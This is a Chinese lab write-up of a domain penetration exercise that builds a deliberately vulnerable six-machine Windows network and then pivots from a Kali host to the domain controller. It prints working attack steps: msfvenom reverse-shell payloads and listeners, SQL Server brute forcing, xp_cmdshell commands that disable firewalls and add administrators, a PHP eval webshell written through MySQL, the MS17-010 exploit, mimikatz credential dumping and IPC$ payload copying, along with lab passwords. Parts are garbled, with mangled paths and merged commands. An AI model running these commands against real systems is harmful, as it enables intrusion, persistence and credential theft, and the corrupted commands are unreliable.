天天看點

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

0x01 實驗拓撲圖及實驗用IP

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

A組IP(實驗用IP)

1号

賬号:Administrator

密碼:[email protected][email protected]#

ip:192.168.141.111

2号

賬号:ADMIN-PC/ADMIN

密碼:123456hhhh.

222.18.158.244:7771

ip:192.168.141.138

3号

域名:hiro.com

管理者

賬号:hiroadministrator

密碼:hb123456,./$

域使用者

賬号:hiro.com/user1

密碼:hb123456,./$

ip:192.168.141.100

Tips

裡面設了靜态ip 要改一下

已将加入過程總結

4号

賬号:administrator

密碼:[email protected]

ip:192.168.141.114

5号

賬号:Administrator

密碼:[email protected]

ip:192.168.141.115

6号

賬号:Administrator

密碼:Edvison233!

ip:192.168.141.116

0x02 環境搭建步驟

本子產品中的IP隻是作為範例,與正式實驗中所用IP不同

一号機

系統:Windows 10

IP : 192.168.199.101

對三号機192.168.199.103開放445端口

配置步驟:

  1. 在虛拟機上安裝win10系統
  2. 在網絡共享中心配置靜态IP
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機
  1. 對3号機開放445端口:
  2. 建立入站規則(選擇自定義)
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

應用于所有程式:

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

設定端口:

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

指定隻對3号機開放:

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

二号機

系統:Windows 7

IP : 192.168.199.102

配置步驟:

安裝Windows7,設定固定IP

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

三号機

系統:Windows 2012

IP : 192.168.199.103

對192.168.199.104開放445端口

配置步驟:

Windows server 2012 搭建域環境

計算機名:WIN-MT3C3TD4RQD.1.org

所在域名或工作組名稱:1.org

IP位址:192.168.199.103

作業系統:Windows Server 2012 R2

密碼 hb,./123456

安裝步驟

1) 指定AD角色伺服器的IP位址(這裡的IP位址根據企業實際情況配置設定,但一定要是固定IP)

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

2) 點選Server2012左下角的“伺服器管理器”顯示如下界面

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

3) 點選“添加角色和功能按鈕”彈出如下界面

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

4) 點選“下一步”

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

5) 這裡選擇”基于角色或基于功能的安裝”,然後點”下一步”

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

6) 伺服器選擇這裡選擇預設的,假如你需要針對其它主機安裝AD角色,這裡可以選擇你需要的主機,點選”下一步”

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

7) 這裡勾選“Active Directory域服務”,當勾選這個選項時,會彈出如下對話框,點“添加功能”就OK

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

8) 這樣就正确選擇了安裝AD角色,點選”下一步”

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

9) 功能頁面不需要做任何選擇直接點“下一步”

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

10) 這裡是介紹AD角色的功能及注意事項,點選“下一步”

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

11) 勾選”如果需要,自動重新啟動目标伺服器”,然後點選”安裝”

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

12) 安裝成功後我們點選“關閉”,但這還沒有完全安裝成功

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

13) 點選伺服器右上角的“功能按鈕”

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

14) 彈出繼續配置AD的對話框

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

15) 點選”部署後配置”,在紅框處填入相應的域名

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

16) 點選“下一步”,紅色方框選擇域功能級别,綠色方框選擇相應的功能,DNS/GC/RODC,黃色方框輸入目錄服務還原密碼 密碼是 hb,./123456

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

17) 點選“下一步”後配置DNS,由于不需要委派DNS,是以這裡不需要設定,直接點選”下一步”

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

18) 這一步配置Netbios名,若沒有特殊需求預設的就可以,直接點”下一步”

19) 配置日志,資料庫,sysvol路徑,若沒有特殊需求,預設就可以

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

20) 檢視配置資訊,若沒有任何問題直接點”下一步”

21) 這個頁面是檢測是否滿足條件,滿足條件後就可以直接點”安裝”

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

22) 等待機器安裝配置項,可能需要重新開機

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

23) 重新開機後我們會看到AD角色已經安裝完成

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

驗證安裝

  1. 直接打開CMD指令行,輸入”Net query fsmo”,這時會顯示五種角色都已經安裝成功
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機
  1. 若要進一步驗證AD是否安裝正确,可以使用DCDIAG /a指令行
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

設定端口開放:

打開電腦找到控制台,點選控制台進入控制台頁面,點選系統和安全選項

進入系統安全頁面,點選防火牆選項

進入windows防火牆面闆,點選進階設定選項

進入進階設定選項,點選右鍵建立規則

進入規則想到頁面,選擇端口,點選下一步

進入設定端口頁面,設定需要開放的445端口,點選下一步

選擇允許連結,點選下一步

配置檔案項,點選下一步

輸入名稱和描述,點選完成

四号機

系統:Windows 2003

本機密碼為空

IP : 192.168.199.104

對192.168.199.105開放445端口

留Ms17010漏洞

配置步驟:

靜态ip配置

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

設定本機管理者密碼為空

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

防火牆配置

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

攻擊執行個體

攻擊機: kail ip:192.168.246.128 (在本機驗證時沒有使用192.168.199.1xx的IP位址)

靶機: win 2003 ip:192.168.246.141

配置靶機隻對攻擊機開放445端口:

先啟用防火牆:

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

然後編輯445端口

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

點選更改範圍,再将攻擊機的ip添加上去,這樣就配好了。

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

配置ms17_010漏洞

因為win server 2003 在未打更新檔時都有ms17_010漏洞,是以我直接展示利用過程。

利用msf進行攻擊

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

獲得shell

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

五号機

系統:Windows server 2008

IP : 192.168.199.105

對192.168.199.106開放80端口

安裝PHP study ,MySQL弱密碼

1、首先完成本機phpstudy及MySQL的安裝

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

2、配置本機的靜态IP為192.168.199.105

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

3、配置防火牆對六号機開放80端口

在指令行中使用wf.msc打開防火牆進階設定

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

在入站規則裡添加新的規則,設定端口80

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

在新添加的規則右鍵屬性

在作用域裡添加本地IP位址為192.168.199.106,即六号機的IP

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

六号機

系統:Windows server 2008

IP : 192.168.199.106

對192.168.199.102開放1433端口

Sa賬号為弱密碼

本機是六号機

作業系統是 windows server 2008

Ip是 192.168.199.106

要求是配置一個sqlserver sa為弱密碼的機器

對2号開放1433端口

首先,配置sqlserver

下載下傳SQL Server安裝程式

輕按兩下運作下載下傳的SQL Server安裝程式SQLEXPRWT_x64_CHS.exe。

打開SQLServer安裝中心,在右邊選擇“全新安裝或向現有安裝添加功能”。

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

SQL Server開始安裝準備。一直下一步。

在“資料庫引擎配置”中,選擇“混合模式”,并為“SQLServer系統管理者賬戶(sa)”指定密碼,這裡設定為弱密碼

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

一直下一步 直到安裝成功。

然後設定對二号機開放1433端口

第1步選擇“打開或者關閉windows防火牆”把防火牆打開,然後選擇“進階設定”,選擇“建立規則”來指定端口。

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

現在“建立規則”,選擇“端口”下--“TCP”和“特定本地端口”然後填寫“1433”--下一步--下一步--為這個端口添加一個名稱“1433”,然後确定就可以了。/3、在“入站規則”裡選擇剛才建立的規則,名稱是“1433”,然後按照下圖順序就可以了。

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

配置成功

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

以下為内網滲透測試過程

0x03 使用kali拿下二号機

通過MobaXterm連接配接Kali Linux(ip:192.168.141.143),使用者名:root,密碼:toor

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

使用下述指令,執行,生成木馬檔案:

msf -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.141.143 LPORT=4444 -f exe > ./test.exe
           
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

生成了test.exe之後,然後在kali裡,設定端口監聽,等待目标上線

msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp;show options; set LHOST 192.168.141.143;set LPORT 4444; run"
           
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

在2号機上右擊,以管理者權限執行。kali就可以接收到反彈回來的shell。對shell進行操作。

在kali裡接收到了shell,可在meterpreter中管理shell,開啟3389

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

在kali裡接收到了shell,可在meterpreter中管理shell,開啟3389

run post/windows/manage/enable_rdp
           

添加使用者

run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."
           
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

然後在伺服器主機中,用新添加的賬号,遠端桌面連接配接2号機,至此完成了對2号機的控制

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

2号機到6号機

使用nmap掃描發現192.168.141.116開了1433端口

nmap -p1433 --open 192.168.141.0/24
           
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

使用ms-sql-brute子產品對6号機sa賬戶進行爆破,獲得使用者名為sa,密碼為123456

nmap -p 1433 --script ms-sql-brute --script-args userdb=C:甥敳獲Waldo1111testDesktopame.txt,passdb=C:甥敳獲Waldo1111testDesktoppassword.txt 192.168.141.116
           
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

使用sqltools擷取6号機資料庫

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

用xp_cmdshell關閉防火牆限制

netsh firewall set opmode mode=disable
           
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

添加3389入站規則

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
           
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

建立管理者使用者Waldo6TEST

net user Waldo6TEST 1234567hhhh. /addnet localgroup administrators Waldo6TEST /add
           
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

使用使用者名Wado6TEST 密碼1234567hhhh.成功登陸六号機

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

6号機到5号機

發現5号機開放80端口

輸入://192.168.141.115/phpmyadmin/,弱密碼 使用者名root 密碼root

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

嘗試寫入webshell

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機
use mysql;CREATE TABLE `mysql`.`d0g3` (`sn00py` TEXT NOT NULL );INSERT INTO `mysql`.`d0g3` (`sn00py`)VALUES ('<?php @eval($_POST[c]);?>');SELECT sn00py FROM d0g3 INTO OUTFILE 'C:/pentest/phpstudy/WWW/shell.php';
           

Shell寫到了:http://192.168.141.115/shell.php

使用菜刀連接配接

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

執行指令whoami,發現是administrator權限

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

加管理者使用者

net user Waldo 1234567hhhh. /addnet localgroup administrators Waldo /add
           

打開5号機3389端口:

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
           
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

連接配接到遠端桌面

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

5号機到4号機

在5号機上傳ms17010攻擊腳本,用kali攻擊機生成一個payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.141.143 lport=6666 -f exe -o shell.exe
           

開啟msf監聽

msfconsole -quse exploit/multi/handlerset lhost 0.0.0.0set lport 6666exploit
           

在5号機中cmd中C:甥敳獲WaldoMS17-010-master

在5号機上,運作ms170101攻擊腳本(腳本要自己下載下傳)

python zzz_exploit.py 192.168.141.114
           
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

在kali裡接收到了shell,可在meterpreter中管理shell,開啟3389

run post/windows/manage/enable_rdp
           

添加使用者

run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."
           

在5号機遠端登入4号機

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

4号機到3号機

在4号機中抓取hash

privilege::debugsekurlsa::logonpasswords
           

抓到域控管理者賬号和密碼:

Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

在4号機上,使用以下指令建立IPC$連接配接

net use 192.168.141.100 "hb123456,./$" /user:"Administrator"
           
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

在4号機上,使用以下指令,将目标靶機的C槽映射到本地Z盤

net use z: 192.168.141.100c$
           
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機

使用copy指令将先前生成的shell.exe拷貝至靶機C槽

copy shell.exe 192.168.141.100c$
           
Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控0x01 實驗拓撲圖及實驗用IP0x02 環境搭建步驟0x03 使用kali拿下二号機2号機到6号機6号機到5号機5号機到4号機4号機到3号機3号機到1号機
